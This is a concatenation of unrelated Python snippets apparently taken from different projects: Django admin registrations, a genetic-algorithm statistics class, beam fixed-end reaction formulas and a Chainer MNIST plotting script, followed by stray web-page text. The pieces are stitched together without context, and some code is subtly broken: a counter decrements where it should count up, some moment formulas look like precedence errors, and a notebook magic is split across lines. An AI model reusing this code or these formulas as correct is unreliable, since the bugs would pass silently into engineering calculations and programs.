admin.site.register(Company)
admin.site.register(Product)
admin.site.register(ProductParameters)
admin.site.register(ParametersDescription)
admin.site.register(EcosystemsDescription)
admin.site.register(ClassesDescription)
admin.site.register(ProductClasses)
admin.site.register(ProductEcosystems)
|
from collections import Counter
class Statistic(object):
def __init__(self,fitness_list,father_med):
self.fitness_list = fitness_list
if father_med:
self.calc_abovebelow(father_med)
#high_fit, low_fit, med
def best(self):
first = True
best = None
for fitness in self.fitness_list :
if first:
best = fitness
first = False
else:
if fitness < best:
best = fitness
return best
def worse(self):
first = True
worse = None
for fitness in self.fitness_list :
if first:
worse = fitness
first = False
else:
if fitness > worse:
worse = fitness
return worse
def med(self):
med = 0.0
for fitness in self.fitness_list :
med += float(fitness)
return med / float(self.fitness_list.__len__())
def n_rep(self):
n_rep = 0
C = Counter(self.fitness_list)
rep = [ [k,]*v for k,v in C.items()]
for l in rep:
n_rep += (l.__len__()-1)
return n_rep
def calc_abovebelow(self,father_med):
above = 0
below = 0
for fitness in self.fitness_list:
if fitness > father_med:
above+=1
else:
below-=1
self.above = above
self.below = below
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 9 11:39:00 2018
@author: Ilias
"""
import sys
def comInLoads(function, L, q, a=0, b=0):
'''Combines aLL the functions to compute the reactions. Arg function is
the appropriate function for the specific Load and is passed here through
the GUI. Arg q can be either a vector or a tupLe(for the triagLe Load)'''
if function[0]=='c':
m1,m2,q1,q2 = getattr(sys.modules[__name__], function)(L,q, a, b)
return m1,m2,q1,q2
elif function[0]=='a':
n1, n2 = getattr(sys.modules[__name__], function)(L,q, a, b)
return n1, n2
def cFE(L, q, a, b):
Q1 = Q2 = q*L/2
M1 = M2 = q*L*L/12
return M1, -M2, -Q1, -Q2
def cPE(L, q, a, b):
Q1 = q*(L**4-(b**3)*(2*L-b)-a*(2*L**3-2*L*a**2+a**3))/(2*L**3)
Q2 = q*(L**4-(a**3)*(2*L-a)-b*(2*L**3-2*L*b**2+b**3))/(2*L**3)
M1 = q*(L**4-(b**3)*(4*L-3*b)-(a**2)*(6*L**2-8*a*L+3*a**2))/12*L**2
M2 = q*(L**4-(a**3)*(4*L-3*a)-(b**2)*(6*L**2-8*b*L+3*b**2))/12*L**2
return M1, -M2, -Q1, -Q2
def cFT(L, q, a, b):
#gia ayjanomeno trigwniko. gia fortio pou meiwnetai anapoda ta Q1,Q2,M1,M2
q1, q2 = q
Q1 = 3*q2*L/20
Q2 = 7*q2*L/20
M1 = q2*L*L/30
M2 = q2*L*L/20
if q1 == 0:
return M1, -M2, -Q1, -Q2
else:
Q1, Q2 = Q2, Q1
M1, M2 = M2, M1
return M1, -M2, -Q1, -Q2
def cPT(L, q, a, b):
#gia ayjanomeno trigwniko. gia fortio pou meiwnetai anapoda ta Q1,Q2,M1,M2
b=L-b
q1, q2 = q
Q1 = -a**2*q2/(2*L) + b**2*q2/(2*L) + 3*a**4*q2/(4*L**3) - 3*b**4*q2/(4*L**3) - 2*a**5*q2/(5*L**4) + 2*b**5*q2/(5*L**4)
Q2 = -3*a**4*q2/(4*L**3) + 3*b**4*q2/(4*L**3) + 2*a**5*q2/(5*L**4) - 2*b**5*q2/(5*L**4)
M1 = -a**3*q2/(3*L) + b**3*q2/(3*L) + a**4*q2/(2*L**2) - b**4*q2/(2*L**2) - a**5*q2/(5*L**3) + b**5*q2/(5*L**3)
M2 = -a**4*q2/(4*L**2) + b**4*q2/(4*L**2) + a**5*q2/(5*L**3) - b**5*q2/(5*L**3)
if q1 == 0:
return M1, -M2, -Q1, -Q2
else:
Q1, Q2 = Q2, Q1
M1, M2 = M2, M1
return M1, -M2, -Q1, -Q2
def cPo(L, q, a, b):
Q1 = (q*(b**2)/(L**2))*(3-2*b/L)
Q2 = (q*(a**2)/(L**2))*(3-2*a/L)
M1 = q*a*(b**2)/(L**2)
M2 = q*b*(a**2)/(L**2)
return M1, -M2, -Q1, -Q2
def cM(L, q, a, b):
Q1 = 6*q*a*b/(L**3)
Q2 = -6*q*a*b/(L**3)
M1 = q*b*(2-3*b/L)/L
M2 = q*a*(2-3*a/L)/L
return M1, M2, -Q1, Q2
def aFE(L, q, a, b):
N1 = q*(L-a-b)*(L-a+b)/(2*L)
N2 = q*(L-a-b)*(L+a-b)/(2*L)
return -N1, -N2
def aPE(L, q, a, b):
N1 = q*(L-a-b)*(L-a+b)/(2*L)
N2 = q*(L-a-b)*(L+a-b)/(2*L)
return -N1, -N2
def aFT(L, q, a, b):
if q[0]==0:q=q[1]
else:q=q[0]
N1 = q*(L-a-b)*(L-a+b)/(2*L)
N2 = q*(L-a-b)*(L+a-b)/(2*L)
return -N1/2, -N2/2
def aPT(L, q, a, b):
if q[0]==0:q=q[1]
else:q=q[0]
N1 = q*(L-a-b)*(L-a+b)/(2*L)
N2 = q*(L-a-b)*(L+a-b)/(2*L)
return -N1/2, -N2/2
def aPo(L, q, a, b):
N1 = q*b/L
N2 = q*a/L
return -N1, -N2
def aM(L, q, a, b):
M1 = q*b/L
M2 = q*a/L
return -M1, -M2
|
import chainer
import matplotlib
import matplotlib.pyplot as plt
% matplotlib
inline
# Load the MNIST dataset from pre-inn chainer method
train, test = chainer.datasets.get_mnist(ndim=1)
ROW = 4
COLUMN = 5
for i in range(ROW * COLUMN):
# train[i][0] is i-th image data with size 28x28
image = train[i][0].reshape(28, 28) # not necessary to reshape if ndim is set to 2
plt.subplot(ROW, COLUMN, i + 1) # subplot with size (width 3, height 5)
plt.imshow(image, cmap='gray') # cmap='gray' is for black and white picture.
# train[i][1] is i-th digit label
plt.title('label = {}'.format(train[i][1]))
plt.axis('off') # do not show axis value
plt.tight_layout() # automatic padding between subplots
plt.savefig('images/mnist_plot.png')
plt.show()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.